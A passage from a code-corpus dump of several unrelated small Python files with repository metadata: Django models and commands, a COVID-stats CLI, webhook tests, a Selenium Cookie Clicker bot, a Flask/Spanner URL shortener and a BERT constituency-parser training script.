    uniqueness here (null=True, no unique constraint).  Confirm intentional.
    """
    username = models.CharField(max_length=150, null=True)
    first_name = models.CharField(max_length=200)
    last_name = models.CharField(max_length=200)
    # unique=True makes the address usable as the login identifier below.
    email = models.CharField(max_length=200, unique=True)
    password = models.CharField(max_length=200)
    # Deleting a Role keeps its users (the FK is set to NULL).
    role = models.ForeignKey(Role, on_delete=models.SET_NULL, null=True)
    is_superuser = models.BooleanField(default=False)
    is_staff = models.BooleanField(default=False)
    is_active = models.BooleanField(default=True)
    date_joined = models.DateTimeField(auto_now_add=True)
    # Authenticate with the e-mail; username is still asked for by createsuperuser.
    USERNAME_FIELD = "email"
    REQUIRED_FIELDS = ["username"]
| 0 | 773 | 69 |
b0d2c589d7c570142c12c27762103472956c016b | 196 | py | Python | cleanup_later/management/commands/cleanup_later.py | mtskelton/django-cleanup-later | 79b99a413223a15b614fa585d2a557894ff8e952 | [
"MIT"
] | 1 | 2019-08-02T11:42:05.000Z | 2019-08-02T11:42:05.000Z | cleanup_later/management/commands/cleanup_later.py | mtskelton/django-cleanup-later | 79b99a413223a15b614fa585d2a557894ff8e952 | [
"MIT"
] | null | null | null | cleanup_later/management/commands/cleanup_later.py | mtskelton/django-cleanup-later | 79b99a413223a15b614fa585d2a557894ff8e952 | [
"MIT"
] | null | null | null | from django.core.management.base import BaseCommand
from cleanup_later.models import CleanupFile
| 24.5 | 51 | 0.760204 | from django.core.management.base import BaseCommand
from cleanup_later.models import CleanupFile
class Command(BaseCommand):
    """``manage.py cleanup_later`` — thin wrapper around ``CleanupFile.cleanup()``."""
    def handle(self, *args, **kwargs):
        """Run the cleanup; positional/keyword options are accepted but unused."""
        CleanupFile.cleanup()
| 43 | 6 | 49 |
69c82a946030df0018ad8fb9dd6e2805913e6643 | 4,506 | py | Python | covidtracker/covid.py | shubraj/covidTracker | f1a6ef3911651733c08d8c0212744e97acbd6c00 | [
"MIT"
] | null | null | null | covidtracker/covid.py | shubraj/covidTracker | f1a6ef3911651733c08d8c0212744e97acbd6c00 | [
"MIT"
] | null | null | null | covidtracker/covid.py | shubraj/covidTracker | f1a6ef3911651733c08d8c0212744e97acbd6c00 | [
"MIT"
] | null | null | null | #! /usr/bin/python3
import requests,argparse,sys,colorama,pyfiglet
from colorama import Fore,Style
if __name__ == "__main__":
Covid().stats | 51.204545 | 122 | 0.576787 | #! /usr/bin/python3
import requests,argparse,sys,colorama,pyfiglet
from colorama import Fore,Style
class Covid:
    """Terminal COVID-19 tracker backed by the disease.sh API.

    NOTE(review): the argparse setup below lives in the class body, so
    command-line arguments are parsed at *import* time (importing this module
    with unrelated argv will misbehave); consider moving it into a function.
    Several ``help`` strings also look copy-pasted ("radius" for the country
    argument, "deaths" for -f).
    """
    colorama.init(autoreset=True)
    parser = argparse.ArgumentParser(description="View By Country")
    parser.add_argument("country",nargs="?",metavar="",type=str,help="radius")
    parser.add_argument("-d","--deaths",action="store_true",help="deaths")
    parser.add_argument("-c","--cases",action="store_true",help="total cases")
    parser.add_argument("-g","--todayCases",action="store_true",help="today cases")
    parser.add_argument("-f","--deathsToday",action="store_true",help="deaths")
    parser.add_argument("-r","--recovered",action="store_true",help="recovered")
    parser.add_argument("-e","--todayRecovered",action="store_true",help="todayRecovered")
    parser.add_argument("-b","--critical",action="store_true",help="critical")
    parser.add_argument("-a","--active",action="store_true",help="active")
    parser.add_argument("-i","--tests",action="store_true",help="tests")
    parser.add_argument("-t","--today",action="store_true",help="today's cases")
    args = parser.parse_args()
    # All endpoints are relative to this API root.
    base_url = "https://disease.sh/v3/covid-19/"
    def _myLocation(self):
        """Geo-locate the caller via freegeoip.app; returns the country name, or None."""
        response = requests.get("https://freegeoip.app/json/")
        if response.status_code == 200:
            country = response.json().get('country_name')
            return country
    def _getResponse(self,endpoint):
        """GET *endpoint*; returns parsed JSON on HTTP 200, otherwise None (silently)."""
        response = requests.get(endpoint)
        if response.status_code == 200:
            return response.json()
    @staticmethod
    def printOut(arg,value):
        """Pretty-print one statistic; non-country values get thousands separators."""
        if arg != "country":
            sys.stdout.write(f"{Fore.RED}[+] {Fore.BLUE}{Style.BRIGHT}{arg}: {Fore.WHITE}{Style.BRIGHT}{int(value):,} \n")
        else:
            sys.stdout.write(f"{Fore.RED}[+] {Fore.BLUE}{Style.BRIGHT}{arg}: {Fore.WHITE}{Style.BRIGHT}{value} \n")
        sys.stdout.flush()
    @property
    def stats(self):
        """Fetch stats for the requested (or geo-located) country and print the selected fields."""
        mycountry = self.args.country if self.args.country else self._myLocation()
        if mycountry:
            # args_status tracks whether any flag was handled; if none, dump everything.
            args_status = False
            json_response = self._getResponse(f"{self.base_url}countries/{mycountry}")
            sys.stdout.write(pyfiglet.figlet_format("Covid Tracker",justify="center"))
            sys.stdout.flush()
            if json_response:
                if self.args.cases:
                    self.printOut("cases",json_response.get("cases"))
                    args_status = True
                if self.args.deaths:
                    self.printOut("deaths",json_response.get("deaths"))
                    args_status = True
                if self.args.recovered:
                    self.printOut("recovered",json_response.get("recovered"))
                    args_status = True
                if self.args.critical:
                    # NOTE(review): prints the "deaths" value under the "critical"
                    # label — probably meant json_response.get("critical").
                    self.printOut("critical",json_response.get("deaths"))
                    args_status = True
                if self.args.active:
                    self.printOut("active",json_response.get("active"))
                    args_status = True
                if self.args.tests:
                    self.printOut("tests",json_response.get("tests"))
                    args_status = True
                if self.args.today:
                    self.printOut("todayCases",json_response.get("todayCases"))
                    self.printOut("todayRecovered",json_response.get("todayRecovered"))
                    self.printOut("deathsToday",json_response.get("todayDeaths"))
                    args_status = True
                else:
                    # -t not given: honour the individual "today" flags instead.
                    if self.args.todayCases:
                        self.printOut("todayCases",json_response.get("todayCases"))
                        args_status = True
                    if self.args.deathsToday:
                        self.printOut("deathsToday",json_response.get("todayDeaths"))
                        args_status = True
                    if self.args.todayRecovered:
                        self.printOut("todayRecovered",json_response.get("todayRecovered"))
                        args_status = True
                if not args_status:
                    # No flags at all: dump every field except metadata keys.
                    exclude = ("updated","countryInfo","undefined","continent")
                    for key in exclude:
                        json_response.pop(key)
                    for key in json_response:
                        self.printOut(key,json_response[key])
            else:
                sys.exit("something went wrong")
if __name__ == "__main__":
Covid().stats | 3,153 | 1,187 | 23 |
76e8b7b6c75bc8b4098b65e168d8de336da3c675 | 19 | py | Python | olamundo.py | adrianomdantas/Exercicios-Python | ef5025a186615258aec0cf35ed839fe49577d983 | [
"MIT"
] | null | null | null | olamundo.py | adrianomdantas/Exercicios-Python | ef5025a186615258aec0cf35ed839fe49577d983 | [
"MIT"
] | null | null | null | olamundo.py | adrianomdantas/Exercicios-Python | ef5025a186615258aec0cf35ed839fe49577d983 | [
"MIT"
] | null | null | null | print('olá mundo')
| 9.5 | 18 | 0.684211 | print('olá mundo')
| 0 | 0 | 0 |
752acca83420a261615db438667ac9dfb606fb95 | 2,057 | py | Python | gitd/core/tests/test_github_handler.py | vitorfs/gitd | 8ab1091b986409127ed3f77676b92d64fbb2a52e | [
"MIT"
] | 4 | 2020-11-01T22:57:50.000Z | 2020-11-27T16:25:05.000Z | gitd/core/tests/test_github_handler.py | vitorfs/gitd | 8ab1091b986409127ed3f77676b92d64fbb2a52e | [
"MIT"
] | null | null | null | gitd/core/tests/test_github_handler.py | vitorfs/gitd | 8ab1091b986409127ed3f77676b92d64fbb2a52e | [
"MIT"
] | 1 | 2021-02-16T20:58:15.000Z | 2021-02-16T20:58:15.000Z | import uuid
from django.test import TestCase, override_settings
from gitd.core.constants import GitHubEvents
from gitd.core.exceptions import GitHubException
from gitd.core.handlers import github_handler
from gitd.core.models import Deployment
| 43.765957 | 117 | 0.703452 | import uuid
from django.test import TestCase, override_settings
from gitd.core.constants import GitHubEvents
from gitd.core.exceptions import GitHubException
from gitd.core.handlers import github_handler
from gitd.core.models import Deployment
class TestGitHubHandler(TestCase):
    """Unit tests for the ``github_handler`` webhook dispatcher."""
    def test_ping(self):
        """A PING event is answered with "pong"."""
        expected = "pong"
        actual = github_handler({}, GitHubEvents.PING, str(uuid.uuid4()))
        self.assertEqual(expected, actual)
    @override_settings(GITHUB_REPOSITORY="example/example")
    def test_deploy_bad_repo(self):
        """A PUSH for a repository other than the configured one raises GitHubException."""
        data = {"repository": {"full_name": "example/bad-example"}}
        with self.assertRaisesMessage(GitHubException, "Invalid repository."):
            github_handler(data, GitHubEvents.PUSH, str(uuid.uuid4()))
    @override_settings(GITHUB_REPOSITORY="example/example", GITHUB_BRANCH="refs/heads/main")
    def test_deploy_bad_branch(self):
        """A PUSH to a non-deployment branch is ignored with an explanatory message."""
        data = {"ref": "refs/heads/dev", "repository": {"full_name": "example/example"}}
        expected = "Event ignored because it was not pushed to refs/heads/main."
        actual = github_handler(data, GitHubEvents.PUSH, str(uuid.uuid4()))
        self.assertEqual(expected, actual)
    @override_settings(
        GITHUB_REPOSITORY="example/example", GITHUB_BRANCH="refs/heads/main", GITD_DEPLOYMENT_COMMAND="echo 'deploy'"
    )
    def test_deploy_successful(self):
        """A valid PUSH creates a Deployment recording the delivery id."""
        data = {"ref": "refs/heads/main", "repository": {"full_name": "example/example"}}
        self.assertEqual(0, Deployment.objects.count())
        delivery_id = str(uuid.uuid4())
        actual = github_handler(data, GitHubEvents.PUSH, delivery_id)
        deployment = Deployment.objects.first()
        expected = "Deployment started with id %s." % deployment.pk
        self.assertEqual(expected, actual)
        self.assertIsNotNone(deployment)
        self.assertEqual(delivery_id, deployment.delivery)
    def test_bad_event(self):
        """An unknown event name raises GitHubException."""
        with self.assertRaisesMessage(GitHubException, "Invalid event."):
            github_handler({}, "BAD_EVENT", str(uuid.uuid4()))
| 1,339 | 448 | 23 |
7062857693723d59531fd8a709551db00b6e328b | 92 | py | Python | web_MNIST/apps.py | lorenzophys/django-web-MNIST | 5219fa9c1858cabd910dce5fdcce7bf8988ff8a2 | [
"MIT"
] | null | null | null | web_MNIST/apps.py | lorenzophys/django-web-MNIST | 5219fa9c1858cabd910dce5fdcce7bf8988ff8a2 | [
"MIT"
] | null | null | null | web_MNIST/apps.py | lorenzophys/django-web-MNIST | 5219fa9c1858cabd910dce5fdcce7bf8988ff8a2 | [
"MIT"
] | null | null | null | from django.apps import AppConfig
| 15.333333 | 33 | 0.76087 | from django.apps import AppConfig
class WebMnistConfig(AppConfig):
    """Django application configuration for the ``web_MNIST`` app."""
    name = 'web_MNIST'
| 0 | 34 | 23 |
084ec0011d47d9536c75eb288f729b41dd67fc53 | 1,038 | py | Python | cookieClicker.py | fredericoqueiroz/automated-cookie-clicker | 16e65b51b234cca6a31617d9d29682eea2dccae7 | [
"MIT"
] | null | null | null | cookieClicker.py | fredericoqueiroz/automated-cookie-clicker | 16e65b51b234cca6a31617d9d29682eea2dccae7 | [
"MIT"
] | null | null | null | cookieClicker.py | fredericoqueiroz/automated-cookie-clicker | 16e65b51b234cca6a31617d9d29682eea2dccae7 | [
"MIT"
] | null | null | null | from selenium import webdriver
from selenium.webdriver.common.action_chains import ActionChains
PATH = "C:\Program Files (x86)\chromedriver.exe"
driver = webdriver.Chrome(PATH)
driver.get("https://orteil.dashnet.org/cookieclicker/")
driver.implicitly_wait(5)
cookie = driver.find_element_by_id("bigCookie")
cookie_count = driver.find_element_by_id("cookies")
items = [[driver.find_element_by_id("productName" + str(i)), driver.find_element_by_id("productPrice" + str(i))] for i in range(3, -1, -1)]
#print(items)
actions = ActionChains(driver)
actions.click(cookie)
for i in range(2000):
actions.perform()
count = int(cookie_count.text.split(" ")[0])
for item_name, item_value in items:
value = int(item_value.text)
if value <= count:
building_actions = ActionChains(driver)
building_actions.move_to_element(item_name)
building_actions.click()
building_actions.perform()
print("Just bought {} for {} cookies...".format(item_name.text, value))
| 33.483871 | 139 | 0.705202 | from selenium import webdriver
from selenium.webdriver.common.action_chains import ActionChains
# Windows path to the chromedriver binary (hard-coded for this machine).
PATH = "C:\Program Files (x86)\chromedriver.exe"
driver = webdriver.Chrome(PATH)
driver.get("https://orteil.dashnet.org/cookieclicker/")
driver.implicitly_wait(5)
# Page elements: the big cookie, the cookie counter, and the four cheapest
# buildings (name + price), listed cheapest-last so they are checked last.
cookie = driver.find_element_by_id("bigCookie")
cookie_count = driver.find_element_by_id("cookies")
items = [[driver.find_element_by_id("productName" + str(i)), driver.find_element_by_id("productPrice" + str(i))] for i in range(3, -1, -1)]
#print(items)
# Reusable click action targeting the big cookie.
actions = ActionChains(driver)
actions.click(cookie)
# Click 2000 times; after each click, buy any building we can afford.
for i in range(2000):
    actions.perform()
    # Counter text looks like "<number> cookies ..." — take the leading number.
    count = int(cookie_count.text.split(" ")[0])
    for item_name, item_value in items:
        value = int(item_value.text)
        if value <= count:
            building_actions = ActionChains(driver)
            building_actions.move_to_element(item_name)
            building_actions.click()
            building_actions.perform()
            print("Just bought {} for {} cookies...".format(item_name.text, value))
| 0 | 0 | 0 |
ae2d83d799c5f8fa35b6b4f1abcb0b05bbb6cad6 | 3,415 | py | Python | app/__main__.py | MihanixA/runfaster | fb8a80d7b9ca9ea278788cb4d4cd863254ce8b17 | [
"MIT"
] | 5 | 2020-02-10T15:54:24.000Z | 2020-02-12T10:04:38.000Z | app/__main__.py | MihanixA/runfaster | fb8a80d7b9ca9ea278788cb4d4cd863254ce8b17 | [
"MIT"
] | null | null | null | app/__main__.py | MihanixA/runfaster | fb8a80d7b9ca9ea278788cb4d4cd863254ce8b17 | [
"MIT"
] | null | null | null | import os
import re
import logging
from binascii import crc_hqx
from datetime import datetime
from flask import Flask, request, render_template, redirect
from flask_wtf import FlaskForm
from wtforms import StringField
from wtforms.validators import DataRequired
from flask_bootstrap import Bootstrap
from gevent.pywsgi import WSGIServer
from google.cloud import spanner
from google.api_core.exceptions import AlreadyExists
secret_key = os.urandom(32)
app = Flask(__name__)
Bootstrap(app)
app.secret_key = secret_key.hex()
spanner_client = spanner.Client()
app_settings = os.environ.get('APP_SETTINGS')
instance_id = os.environ.get('SPANNER_INSTANCE', 'runfaster-spanner')
database_id = os.environ.get('SPANNER_DATABASE', 'runfaster')
database = spanner_client.instance(instance_id).database(database_id, ddl_statements=["""CREATE TABLE urls (
shorten STRING(MAX) NOT NULL,
created_at TIMESTAMP NOT NULL OPTIONS (allow_commit_timestamp=true),
source STRING(MAX) NOT NULL,
) PRIMARY KEY (shorten)
"""])
source_regex = re.compile("https?://(?:[-\\w.]|(?:%[\\da-fA-F]{2}))+")
shorten_regex = re.compile("[a-zA-Z0-9]")
@app.route('/<string:shorten>', methods=['GET'])
@app.route('/', methods=['GET', 'POST'])
if __name__ == '__main__':
main()
| 28.940678 | 108 | 0.660908 | import os
import re
import logging
from binascii import crc_hqx
from datetime import datetime
from flask import Flask, request, render_template, redirect
from flask_wtf import FlaskForm
from wtforms import StringField
from wtforms.validators import DataRequired
from flask_bootstrap import Bootstrap
from gevent.pywsgi import WSGIServer
from google.cloud import spanner
from google.api_core.exceptions import AlreadyExists
secret_key = os.urandom(32)
app = Flask(__name__)
Bootstrap(app)
app.secret_key = secret_key.hex()
spanner_client = spanner.Client()
app_settings = os.environ.get('APP_SETTINGS')
instance_id = os.environ.get('SPANNER_INSTANCE', 'runfaster-spanner')
database_id = os.environ.get('SPANNER_DATABASE', 'runfaster')
database = spanner_client.instance(instance_id).database(database_id, ddl_statements=["""CREATE TABLE urls (
shorten STRING(MAX) NOT NULL,
created_at TIMESTAMP NOT NULL OPTIONS (allow_commit_timestamp=true),
source STRING(MAX) NOT NULL,
) PRIMARY KEY (shorten)
"""])
source_regex = re.compile("https?://(?:[-\\w.]|(?:%[\\da-fA-F]{2}))+")
shorten_regex = re.compile("[a-zA-Z0-9]")
def get_source(shorten: str):
    """Return the original URL stored under *shorten*.

    Raises ValueError for a malformed key and IndexError when no row exists
    (both are mapped to error pages by the route handlers).
    """
    if not shorten_regex.match(shorten):
        raise ValueError("wrong input")
    with database.snapshot() as snapshot:
        rows = list(
            snapshot.execute_sql(
                "SELECT source FROM urls WHERE shorten=@shorten",
                params={"shorten": shorten},
                param_types={"shorten": spanner.param_types.STRING},
            )
        )
        return rows[0][0]
def _generate_shorten(source: str):
    """Derive the short key: lowercase hex of the CRC-16/XMODEM of *source*'s UTF-8 bytes."""
    checksum = crc_hqx(source.encode(), 0)
    return format(checksum, "x")
def create_shorten(source: str):
    """Store *source* and return its short key.

    The insert is idempotent: if the key already exists the AlreadyExists
    error is swallowed and the existing key is returned.
    """
    if not source_regex.match(source):
        raise ValueError("wrong input")
    key = _generate_shorten(source)
    try:
        with database.batch() as batch:
            batch.insert(
                table='urls',
                columns=('shorten', 'source', 'created_at'),
                values=[(key, source, datetime.utcnow())],
            )
    except AlreadyExists:
        pass  # same key already stored — treat as success
    return key
class UrlForm(FlaskForm):
    """Landing-page form: a single required field holding the URL to shorten."""
    source = StringField('source', validators=[DataRequired()])
@app.route('/<string:shorten>', methods=['GET'])
def redirect_to_source(shorten: str):
    """Resolve a short key and redirect the client to the stored URL."""
    try:
        return redirect(get_source(shorten))
    except ValueError:
        # malformed key
        return render_template('400.html'), 400
    except IndexError:
        # no row stored for this key
        return render_template('404.html'), 404
    except Exception:
        return render_template('500.html'), 500
@app.route('/', methods=['GET', 'POST'])
def index():
    """Render the landing page; on a valid POST, create a shorten for the URL.

    Returns the page with the new shorten on success, the 400 page for a
    malformed URL, and the 500 page for unexpected failures.
    """
    try:
        form = UrlForm()
        shorten = None
        if form.validate_on_submit():
            try:
                source = form.source.data
                shorten = create_shorten(source)
            except ValueError:
                return render_template('400.html'), 400
        return render_template('index.html', form=form, shorten=shorten, base_url=request.base_url)
    except Exception:
        # Fix: also send the 500 status code with the error page (it was
        # returned with 200), matching redirect_to_source's error handling.
        return render_template('500.html'), 500
def main():
    """Entry point: Flask debug server in dev, gevent WSGI server otherwise."""
    if app_settings == 'dev':
        app.logger.setLevel(logging.DEBUG)
        app.run(debug=True, host='localhost', port=8080)
        return
    port = int(os.environ.get('PORT', '8080'))
    WSGIServer(('0.0.0.0', port), app).serve_forever()
if __name__ == '__main__':
main()
| 1,915 | 68 | 159 |
1a6c59844b6771714b26864a5626a9014e3bbc54 | 17,973 | py | Python | main.py | dnanhkhoa/bert-span-parser | 5467a2dc59062b5765bfe5275ea6d7586dcacb2a | [
"MIT"
] | null | null | null | main.py | dnanhkhoa/bert-span-parser | 5467a2dc59062b5765bfe5275ea6d7586dcacb2a | [
"MIT"
] | 1 | 2020-06-03T19:26:22.000Z | 2020-06-04T06:57:16.000Z | main.py | dnanhkhoa/bert-span-parser | 5467a2dc59062b5765bfe5275ea6d7586dcacb2a | [
"MIT"
] | 1 | 2020-12-26T12:07:44.000Z | 2020-12-26T12:07:44.000Z | # -*- coding: utf-8 -*-
import json
import os
import random
import click
import neptune
import numpy as np
import regex
import torch
from loguru import logger
from neptune.exceptions import NoExperimentContext
from torch.utils.data import DataLoader, RandomSampler, SequentialSampler, TensorDataset
from tqdm import tqdm, trange
from bert.optimization import BertAdam
from bert.tokenization import BertTokenizer
from eval import evalb
from label_encoder import LabelEncoder
from model import ChartParser
from trees import InternalParseNode, load_trees
try:
from apex import amp
except ImportError:
pass
MODEL_FILENAME = "model.bin"
BERT_TOKEN_MAPPING = {
"-LRB-": "(",
"-RRB-": ")",
"-LCB-": "{",
"-RCB-": "}",
"-LSB-": "[",
"-RSB-": "]",
}
@click.command()
@click.option("--train_file", required=True, type=click.Path())
@click.option("--dev_file", required=True, type=click.Path())
@click.option("--test_file", required=True, type=click.Path())
@click.option("--output_dir", required=True, type=click.Path())
@click.option("--bert_model", required=True, type=click.Path())
@click.option("--lstm_layers", default=2, show_default=True, type=click.INT)
@click.option("--lstm_dim", default=250, show_default=True, type=click.INT)
@click.option("--tag_embedding_dim", default=50, show_default=True, type=click.INT)
@click.option("--label_hidden_dim", default=250, show_default=True, type=click.INT)
@click.option("--dropout_prob", default=0.4, show_default=True, type=click.FLOAT)
@click.option("--batch_size", default=32, show_default=True, type=click.INT)
@click.option("--num_epochs", default=20, show_default=True, type=click.INT)
@click.option("--learning_rate", default=5e-5, show_default=True, type=click.FLOAT)
@click.option("--warmup_proportion", default=0.1, show_default=True, type=click.FLOAT)
@click.option(
"--gradient_accumulation_steps", default=1, show_default=True, type=click.INT
)
@click.option("--seed", default=42, show_default=True, type=click.INT)
@click.option("--device", default=0, show_default=True, type=click.INT)
@click.option("--fp16", is_flag=True)
@click.option("--do_eval", is_flag=True)
@click.option("--resume", is_flag=True)
@click.option("--preload", is_flag=True)
@click.option("--freeze_bert", is_flag=True)
if __name__ == "__main__":
neptune.init(project_qualified_name=os.getenv("NEPTUNE_PROJECT_NAME"))
try:
# main(
# [
# "--train_file=corpora/WSJ-PTB/02-21.10way.clean.train",
# "--dev_file=corpora/WSJ-PTB/22.auto.clean.dev",
# "--test_file=corpora/WSJ-PTB/23.auto.clean.test",
# "--output_dir=outputs",
# "--bert_model=models/bert-base-multilingual-cased",
# "--batch_size=32",
# "--num_epochs=20",
# "--learning_rate=3e-5",
# # "--fp16",
# # "--do_eval",
# ]
# )
main()
finally:
try:
neptune.stop()
except NoExperimentContext:
pass
| 33.038603 | 93 | 0.589829 | # -*- coding: utf-8 -*-
import json
import os
import random
import click
import neptune
import numpy as np
import regex
import torch
from loguru import logger
from neptune.exceptions import NoExperimentContext
from torch.utils.data import DataLoader, RandomSampler, SequentialSampler, TensorDataset
from tqdm import tqdm, trange
from bert.optimization import BertAdam
from bert.tokenization import BertTokenizer
from eval import evalb
from label_encoder import LabelEncoder
from model import ChartParser
from trees import InternalParseNode, load_trees
# apex is optional: it is only needed when --fp16 mixed precision is requested.
try:
    from apex import amp
except ImportError:
    pass
# Checkpoint filename written to / read from --output_dir.
MODEL_FILENAME = "model.bin"
# PTB bracket tokens -> literal characters, applied before BERT tokenization.
BERT_TOKEN_MAPPING = {
    "-LRB-": "(",
    "-RRB-": ")",
    "-LCB-": "{",
    "-RCB-": "}",
    "-LSB-": "[",
    "-RSB-": "]",
}
def create_dataloader(sentences, batch_size, tag_encoder, tokenizer, is_eval):
    """Convert (tag, word) sentences into BERT features and wrap them in a DataLoader.

    Each feature holds the wordpiece ids (with [CLS]/[SEP]), an all-ones
    attention mask, the encoded tags, and per-word wordpiece counts.  The
    DataLoader yields *indices* into the returned feature list; the actual
    tensors are assembled per batch by prepare_batch_input.
    """
    features = []
    for sentence in sentences:
        tokens, tags, sections = [], [], []
        for tag, phrase in sentence:
            # Split at underscores between word characters, then wordpiece-
            # tokenize each part (mapping PTB bracket tokens to real brackets).
            pieces = []
            for word in regex.split(r"(?<=[^\W_])_(?=[^\W_])", phrase, flags=regex.FULLCASE):
                pieces.extend(tokenizer.tokenize(BERT_TOKEN_MAPPING.get(word, word)))
            tokens.extend(pieces)
            tags.append(tag_encoder.transform(tag, unknown_label="[UNK]"))
            sections.append(len(pieces))
        ids = tokenizer.convert_tokens_to_ids(["[CLS]"] + tokens + ["[SEP]"])
        features.append(
            {
                "ids": ids,
                "attention_mask": [1] * len(ids),
                "tags": tags,
                "sections": sections,
            }
        )
    dataset = TensorDataset(torch.arange(len(features), dtype=torch.long))
    sampler = SequentialSampler(dataset) if is_eval else RandomSampler(dataset)
    return DataLoader(dataset, sampler=sampler, batch_size=batch_size), features
def prepare_batch_input(indices, features, trees, sentences, tag_encoder, device):
    """Assemble one batch: pad id/mask/tag sequences and build tensors.

    Returns (ids, attention_masks, tags, sections, trees, sentences) where the
    first three are long tensors on *device*.  NOTE: padding uses in-place
    ``+=`` and therefore also extends the cached lists inside *features*.
    """
    batch = [features[i] for i in indices]
    ids = [f["ids"] for f in batch]
    masks = [f["attention_mask"] for f in batch]
    tags = [f["tags"] for f in batch]
    sections = [f["sections"] for f in batch]
    batch_trees = [trees[i] for i in indices]
    batch_sentences = [sentences[i] for i in indices]
    max_ids_len = max((len(seq) for seq in ids), default=0)
    max_tags_len = max((len(seq) for seq in tags), default=0)
    # Zero-pad ids and masks to the longest sequence; pad tags with [PAD].
    for seq, mask, tag_seq in zip(ids, masks, tags):
        pad = max_ids_len - len(seq)
        seq += [0] * pad
        mask += [0] * pad
        tag_seq += [tag_encoder.transform("[PAD]")] * (max_tags_len - len(tag_seq))
    ids = torch.tensor(ids, dtype=torch.long, device=device)
    masks = torch.tensor(masks, dtype=torch.long, device=device)
    tags = torch.tensor(tags, dtype=torch.long, device=device)
    return ids, masks, tags, sections, batch_trees, batch_sentences
def eval(
    model,
    eval_dataloader,
    eval_features,
    eval_trees,
    eval_sentences,
    tag_encoder,
    device,
):
    """Run the parser over an evaluation set and score it with EVALB.

    NOTE: deliberately shadows the builtin ``eval`` (name kept for callers).
    """
    model.eval()  # inference mode (disables dropout)
    predictions = []
    for indices, *_ in tqdm(eval_dataloader, desc="Iteration"):
        ids, attention_masks, tags, sections, _, sentences = prepare_batch_input(
            indices=indices,
            features=eval_features,
            trees=eval_trees,
            sentences=eval_sentences,
            tag_encoder=tag_encoder,
            device=device,
        )
        with torch.no_grad():
            batch_trees = model(
                ids=ids,
                attention_masks=attention_masks,
                tags=tags,
                sections=sections,
                sentences=sentences,
                gold_trees=None,  # no gold trees -> the model decodes predictions
            )
        predictions.extend(tree.convert() for tree in batch_trees)
    return evalb(eval_trees, predictions)
@click.command()
@click.option("--train_file", required=True, type=click.Path())
@click.option("--dev_file", required=True, type=click.Path())
@click.option("--test_file", required=True, type=click.Path())
@click.option("--output_dir", required=True, type=click.Path())
@click.option("--bert_model", required=True, type=click.Path())
@click.option("--lstm_layers", default=2, show_default=True, type=click.INT)
@click.option("--lstm_dim", default=250, show_default=True, type=click.INT)
@click.option("--tag_embedding_dim", default=50, show_default=True, type=click.INT)
@click.option("--label_hidden_dim", default=250, show_default=True, type=click.INT)
@click.option("--dropout_prob", default=0.4, show_default=True, type=click.FLOAT)
@click.option("--batch_size", default=32, show_default=True, type=click.INT)
@click.option("--num_epochs", default=20, show_default=True, type=click.INT)
@click.option("--learning_rate", default=5e-5, show_default=True, type=click.FLOAT)
@click.option("--warmup_proportion", default=0.1, show_default=True, type=click.FLOAT)
@click.option(
"--gradient_accumulation_steps", default=1, show_default=True, type=click.INT
)
@click.option("--seed", default=42, show_default=True, type=click.INT)
@click.option("--device", default=0, show_default=True, type=click.INT)
@click.option("--fp16", is_flag=True)
@click.option("--do_eval", is_flag=True)
@click.option("--resume", is_flag=True)
@click.option("--preload", is_flag=True)
@click.option("--freeze_bert", is_flag=True)
def main(*_, **kwargs):
    """Train or evaluate the BERT chart parser (click entry point).

    All CLI options arrive in *kwargs*.  With --do_eval the saved checkpoint
    is loaded and scored on the test set; otherwise the model is trained,
    evaluated on dev each epoch, and the best checkpoint is saved.
    """
    use_cuda = torch.cuda.is_available() and kwargs["device"] >= 0
    device = torch.device("cuda:" + str(kwargs["device"]) if use_cuda else "cpu")
    if use_cuda:
        torch.cuda.set_device(device)
    kwargs["use_cuda"] = use_cuda
    neptune.create_experiment(
        name="bert-span-parser",
        upload_source_files=[],
        params={k: str(v) if isinstance(v, bool) else v for k, v in kwargs.items()},
    )
    logger.info("Settings: {}", json.dumps(kwargs, indent=2, ensure_ascii=False))
    # For reproducibility: seed every RNG and force deterministic cuDNN.
    os.environ["PYTHONHASHSEED"] = str(kwargs["seed"])
    random.seed(kwargs["seed"])
    np.random.seed(kwargs["seed"])
    torch.manual_seed(kwargs["seed"])
    torch.cuda.manual_seed_all(kwargs["seed"])
    torch.backends.cudnn.deterministic = True
    torch.backends.cudnn.benchmark = False
    # Prepare and load data
    tokenizer = BertTokenizer.from_pretrained(kwargs["bert_model"], do_lower_case=False)
    logger.info("Loading data...")
    train_treebank = load_trees(kwargs["train_file"])
    dev_treebank = load_trees(kwargs["dev_file"])
    test_treebank = load_trees(kwargs["test_file"])
    logger.info(
        "Loaded {:,} train, {:,} dev, and {:,} test examples!",
        len(train_treebank),
        len(dev_treebank),
        len(test_treebank),
    )
    logger.info("Preprocessing data...")
    train_parse = [tree.convert() for tree in train_treebank]
    train_sentences = [
        [(leaf.tag, leaf.word) for leaf in tree.leaves()] for tree in train_parse
    ]
    dev_sentences = [
        [(leaf.tag, leaf.word) for leaf in tree.leaves()] for tree in dev_treebank
    ]
    test_sentences = [
        [(leaf.tag, leaf.word) for leaf in tree.leaves()] for tree in test_treebank
    ]
    logger.info("Data preprocessed!")
    logger.info("Preparing data for training...")
    # Collect every POS tag and span label from the training trees
    # (iterative DFS) to fit the two label encoders.
    tags = []
    labels = []
    for tree in train_parse:
        nodes = [tree]
        while nodes:
            node = nodes.pop()
            if isinstance(node, InternalParseNode):
                labels.append(node.label)
                nodes.extend(reversed(node.children))
            else:
                tags.append(node.tag)
    tag_encoder = LabelEncoder()
    tag_encoder.fit(tags, reserved_labels=["[PAD]", "[UNK]"])
    label_encoder = LabelEncoder()
    label_encoder.fit(labels, reserved_labels=[()])
    logger.info("Data prepared!")
    # Settings: optimizer steps are counted before the batch size is divided
    # by the number of gradient-accumulation micro-steps.
    num_train_optimization_steps = kwargs["num_epochs"] * (
        (len(train_parse) - 1) // kwargs["batch_size"] + 1
    )
    kwargs["batch_size"] //= kwargs["gradient_accumulation_steps"]
    logger.info("Creating dataloaders for training...")
    train_dataloader, train_features = create_dataloader(
        sentences=train_sentences,
        batch_size=kwargs["batch_size"],
        tag_encoder=tag_encoder,
        tokenizer=tokenizer,
        is_eval=False,
    )
    dev_dataloader, dev_features = create_dataloader(
        sentences=dev_sentences,
        batch_size=kwargs["batch_size"],
        tag_encoder=tag_encoder,
        tokenizer=tokenizer,
        is_eval=True,
    )
    test_dataloader, test_features = create_dataloader(
        sentences=test_sentences,
        batch_size=kwargs["batch_size"],
        tag_encoder=tag_encoder,
        tokenizer=tokenizer,
        is_eval=True,
    )
    logger.info("Dataloaders created!")
    # Initialize model
    model = ChartParser.from_pretrained(
